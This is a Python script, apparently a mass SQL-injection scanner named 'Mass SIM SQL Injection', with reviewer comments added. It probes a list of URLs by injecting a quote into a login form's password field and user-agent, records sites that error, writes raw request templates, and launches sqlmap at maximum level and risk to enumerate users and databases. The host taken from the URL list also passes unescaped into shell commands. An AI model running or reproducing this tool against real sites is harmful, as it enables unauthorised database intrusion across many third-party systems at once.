import os, platform, time, requests, sys, re, importlib, wget
from zipfile import ZipFile
from urllib.parse import urlparse
# Host OS name as reported by platform.system(); the rest of the file compares
# it against 'Linux' and 'Windows' to choose install and launch commands.
os_plat = platform.system()
class c:
    """ANSI SGR escape sequences used to colour console output."""

    res = "\x1b[0m"   # reset all attributes
    b = "\x1b[1m"     # bold
    r = "\x1b[31m"    # red foreground
    g = "\x1b[32m"    # green foreground
    y = "\x1b[33m"    # yellow foreground
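def check_req(module_name, package_name):
    """Install *package_name* with pip when *module_name* cannot be imported.

    Args:
        module_name: Name passed to ``importlib.import_module``.
        package_name: Distribution name handed to ``pip install``.

    Returns:
        None. A failed install is not raised; pip's own output and exit
        status are the only signal.
    """
    try:
        importlib.import_module(module_name)
    except ImportError:
        # Only needed on the install path, so imported locally.
        import subprocess

        print("[!] Module " + module_name + " is missing")
        # An argument list keeps package_name away from a shell, and
        # sys.executable installs into the interpreter running this script
        # rather than whichever `pip3`/`py` happens to be first on PATH.
        # NOTE(review): the package is installed unpinned and unverified at
        # run time; a requirements file with pinned versions/hashes would
        # make the dependency set reviewable.
        subprocess.run(
            [sys.executable, "-m", "pip", "install", package_name],
            check=False,
        )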
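# Install-on-demand for the two third-party modules.
# NOTE(review): the import statement at the top of this file already imports
# wget and requests, so a missing module raises ImportError there before these
# calls are reached.
check_req("wget", "wget")
check_req("requests", "requests")

# Create the results directory. An existing directory is accepted; any other
# failure (permissions, a regular file named "output") surfaces here instead of
# being swallowed by a bare except and failing later at the first write.
os.makedirs('output', exist_ok=True)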
def depen():
    """Check for, and try to install, the external tools this script shells out to.

    Linux: reads /etc/os-release and proceeds only when the seventh line is
    exactly ``ID_LIKE=debian``; then checks for /usr/bin/xterm and
    /usr/share/sqlmap and installs a missing one with ``apt install -y``.
    Windows: sets the console title and, when ``.sqlmap`` is absent from the
    current directory, downloads a release archive and unpacks it there.
    Any other platform only prints a message.

    Exits the process with status 1 when a package is missing and the
    effective check ``os.getuid() == 0`` fails.
    """
    # NOTE(review): the listing this was taken from had lost its indentation;
    # the nesting below is reconstructed and should be confirmed against the
    # original file.
    if os_plat == 'Linux':
        with open('/etc/os-release') as cekos:
            l = cekos.read().splitlines()
            # Fixed line index: the check depends on ID_LIKE being line 7 of
            # os-release and raises IndexError on a shorter file.
            if l[6] == 'ID_LIKE=debian':
                xt = os.path.exists('/usr/bin/xterm')
                if xt == True:
                    pass
                elif xt == False:
                    # NOTE(review): `user` is only assigned in the sqlmap
                    # branch further down, so reading it here raises
                    # UnboundLocalError.
                    if user == 0:
                        pass
                    else:
                        print(c.b + c.r + '[!] Something missing, run me with sudo to install missing requirements' + c.res)
                        sys.exit(1)
                    print(c.g + c.b +"[*] Installing xterm ..." + c.res)
                    # Runs as root (uid 0 was required above) with -y, i.e.
                    # without an interactive confirmation.
                    os.system('apt install xterm -y')
                    BanSim()
                sqlmap = os.path.exists('/usr/share/sqlmap')
                if sqlmap == True:
                    pass
                elif sqlmap == False:
                    user = os.getuid()
                    if user == 0:
                        pass
                    else:
                        print(c.b + c.r + '[!] Something missing, run me with sudo to install missing requirements' + c.res)
                        sys.exit(1)
                    print(c.g + c.b + "[*] Installing sqlmap ..." + c.res)
                    os.system('apt install sqlmap -y')
                    BanSim()
    elif os_plat == 'Windows':
        sqlwin = os.path.exists('.sqlmap')
        os.system('title Mass SIM SQL Injection - Coded by x0rr')
        if sqlwin == True:
            pass
        elif sqlwin == False:
            pwd = os.getcwd()
            print(c.r + c.b + "[!] Something missing, Try to download it ..." + c.res)
            print(c.g + c.b + "[*] Downloading ...")
            u = "https://github.com/sqlmapproject/sqlmap/archive/refs/tags/1.9.zip"
            # NOTE(review): the archive is fetched and unpacked with no
            # checksum or signature comparison; integrity rests entirely on
            # the HTTPS connection to the host in `u`. The return value
            # `down` is not used afterwards.
            down = wget.download(u, "requ.zip")
            print('\n' + c.res)
            BanSim()
            # Extracts every member into the current working directory.
            with ZipFile(pwd + "\\requ.zip", 'r') as eks:
                eks.extractall(path=pwd + "\\")
            # Renames a directory called 'sqlmap-master' to the hidden name
            # the rest of the script expects, then removes the archive.
            os.rename('sqlmap-master', '.sqlmap')
            os.remove('requ.zip')
        else:
            print(c.b + c.r + "[!] Something wrong" + c.res)
    else:
        # Neither Linux nor Windows: nothing is checked or installed.
        print('something wrong !')
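def clear():
    """Clear the terminal with the platform's native command.

    Runs ``cls`` on Windows and ``clear`` on every other platform.
    """
    # os.name is 'nt' only on Windows. Keying on it means macOS and the other
    # BSDs, which are POSIX and ship `clear`, are no longer sent `cls`.
    os.system('cls' if os.name == 'nt' else 'clear')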
def BanSim():
    """Clear the screen and print the script's ASCII-art banner.

    The banner is a single concatenated string: c.b switches bold on, c.r and
    c.res wrap the two "o" characters in red, and the final c.res resets the
    terminal attributes.
    """
    clear()
    print(c.b + """
______
.-" "-.
/ \
|, .-. .-. ,|
| )(_"""+ c.b + c.r +"""o""" + c.res + c.b +"""/ \"""" + c.b + c.r +"""o""" + c.res + c.b +"""_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_________________________
(_)@8@8{}<________|-\IIIIII/-|__________________________>
)_/ \ /
(@ `--------`
Coded by x0rr
SIM SQL INJECTION""" + c.res)
# Request fixtures shared by every probe sent from Exploit().
# Detection note: all four values are constants, so the traffic this script
# generates is recognisable in web-server logs: the user-agent contains
# "Othros Linux" (one variant ends in a stray single quote) and the form body
# is always usr=a with pwd=a or pwd=a' and FBD=Masuk.
post_data = {"usr": "a", "pwd": "a", "FBD": "Masuk"} # POST data that will be sent to the server
param = {"user-agent": "Mozilla/5.0 (X11; Othros Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'"} # user-agent with an injected ' to trigger a 500 error
post_data2 = {"usr": "a", "pwd": "a'", "FBD": "Masuk"} # POST data with an injected ' to trigger an error
param2 = {"user-agent": "Mozilla/5.0 (X11; Othros Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"} # user-agent without injection
# Print the banner, then run the dependency check/installer.
BanSim()
depen()
# Path of the URL list is read interactively.
# NOTE(review): the handle is opened at module level and never closed; a
# missing or unreadable path raises here with no handling.
Target = open(input("[*] List:~# "), 'r')
# Free-text answer; Exploit() only tests whether it starts with "y"
# (case-insensitive), anything else is treated as "no".
attack = input('[*] want to attack vulnerable target [Y/N]: ')
def Exploit(Target):
    """Probe each URL in *Target* and record the ones that react to a quote.

    For every line of *Target* (an iterable of URL strings) two POST requests
    are sent using the module-level fixtures: ``post_data`` with ``param``, and
    ``post_data2`` with ``param2``. A URL is recorded when the first response
    has status 500, or otherwise when the second response body contains
    ``<b>Fatal error</b>``. Recording appends the URL to ``output/vuln.txt``
    and appends a raw request template to ``output/post_<netloc>.txt``. When
    the module-level ``attack`` answer starts with "y", a new terminal window
    is started that runs sqlmap against that template file.

    Only KeyboardInterrupt is caught (prints a message and exits with
    status 1); any exception raised by ``requests`` propagates and ends the
    loop.

    NOTE(review): ``url_parse[1]`` (the netloc of each list entry) is
    concatenated unescaped into a file name and into the strings passed to
    ``os.system``. The list file is therefore trusted input: shell
    metacharacters or path separators in the host part of an entry would be
    interpreted by the shell / file system on the machine running this script.
    NOTE(review): neither ``requests.post`` call sets a timeout, so one
    unresponsive host can block the loop indefinitely.
    NOTE(review): the listing this was taken from had lost its indentation;
    the nesting below is reconstructed and should be confirmed against the
    original file.
    """
    for url_list in Target:
        url_list = url_list.strip()
        url_parse = urlparse(url_list)
        try:
            p = requests.post(url_list, data=post_data, headers=param)
            p2 = requests.post(url_list, data=post_data2, headers=param2)
            # Local name shadows the module-level os_plat with the same value source.
            os_plat = platform.system()
            pattern = "<b>Fatal error</b>"
            # str() of a bytes object yields its repr ("b'...'"); the pattern
            # is plain ASCII so the search below still matches it.
            content = str(p2.content)
            if p.status_code == 500:
                print(c.b + c.g + "[+] "+ url_list +" | Vuln SQL Injection in user-agent" + c.res)
                with open("output/vuln.txt", 'a') as w:
                    w.write(url_list + '\n')
                # Detection note: the saved template carries a constant
                # PHPSESSID value and a constant Firefox/91.0 user-agent, so
                # follow-up traffic built from it shares those fixed fields.
                with open("output/post_" + url_parse[1] +".txt", 'a') as we:
                    we.write("""POST / HTTP/1.1\nHost: """+ url_parse[1] +"""\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nOrigin: http://"""+ url_parse[1] +"""\nDNT: 1\nConnection: close\nReferer: http://"""+ url_parse[1] +"""/\nCookie: PHPSESSID=huvmumq33uu22oo2ml07indcdgtn3180qtv07kqhicabo0j9dqh0\nUpgrade-Insecure-Requests: 1\n\nusr=a&pwd=a&FBD=Masuk""")
                if attack.lower().startswith("y"):
                    print(c.b + c.g +'[+] Attacking '+ url_parse[1] +' ...'+ c.res)
                    # Command strings are built by concatenation and handed to
                    # the shell; see the docstring note on url_parse[1].
                    if os_plat == 'Windows':
                        os.system('start cmd /k "title Attacking '+ url_parse[1] + ' && py .sqlmap/sqlmap.py -r output/post_' + url_parse[1] + '.txt --threads=1 --level=5 --risk=3 --current-user --current-db --batch --dbs"')
                    elif os_plat == 'Linux':
                        os.system("xterm -xrm 'XTerm.vt100.allowTitleOps: false' -T 'Attacking "+ url_parse[1] +"' -e 'sqlmap -r output/post_"+ url_parse[1] +".txt --threads=10 --level=5 --risk=3 --time-sec=3 --batch --current-user --current-db --dbs && sleep 10'")
                else:
                    pass
            elif (re.search(pattern, content)):
                print(c.b + c.g + "[+] " + url_list +" | Vuln SQL Injection in pwd paramater" + c.res)
                with open('output/vuln.txt', 'a') as w:
                    w.write(url_list + "\n")
                with open("output/post_" + url_parse[1] +".txt", 'a') as we:
                    we.write("""POST / HTTP/1.1\nHost: """+ url_parse[1] +"""\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nOrigin: http://"""+ url_parse[1] +"""\nDNT: 1\nConnection: close\nReferer: http://"""+ url_parse[1] +"""/\nCookie: PHPSESSID=huvmumq33uu22oo2ml07indcdgtn3180qtv07kqhicabo0j9dqh0\nUpgrade-Insecure-Requests: 1\n\nusr=a&pwd=a*&FBD=Masuk""")
                if attack.lower().startswith("y"):
                    print(c.b + c.g +'[+] Attacking '+ url_parse[1] +' ...'+ c.res)
                    # Same launch as the branch above, except the Windows
                    # command uses `python` where the other uses `py`.
                    if os_plat == 'Windows':
                        os.system('start cmd /k "title Attacking '+ url_parse[1] + ' && python .sqlmap/sqlmap.py -r output/post_' + url_parse[1] + '.txt --threads=1 --level=5 --risk=3 --current-user --current-db --batch --dbs"')
                    elif os_plat == 'Linux':
                        os.system("xterm -xrm 'XTerm.vt100.allowTitleOps: false' -T 'Attacking "+ url_parse[1] +"' -e 'sqlmap -r output/post_"+ url_parse[1] +".txt --threads=10 --level=5 --risk=3 --time-sec=3 --batch --current-user --current-db --dbs && sleep 10'")
                else:
                    pass
            else:
                print(c.b + c.r + "[-] "+ url_list +" | Not Vuln" + c.res)
        except KeyboardInterrupt:
            print(c.b + c.r + "[!] exit" + c.res)
            sys.exit(1)
# Announce the output locations before the scan starts.
print(c.y + "\n[*] output will save in" + c.b +" output/vuln.txt" + c.res)
print(c.y + "[*] output requests will save in" + c.b +" output/post_site.com.txt\n" + c.res)
# Run the scan over the list file opened earlier at module level.
Exploit(Target)
# Count the recorded URLs.
# NOTE(review): Exploit() opens output/vuln.txt in append mode and nothing
# truncates it, so this count includes entries left by earlier runs. The file
# only exists once something has been recorded, so this open() raises
# FileNotFoundError otherwise, and the handle is never closed.
count_sim = len(open("output/vuln.txt").readlines())
print(c.b + c.g + "\n[!] "+ str(count_sim )+ " Site vuln with SQL Injection"+ c.res)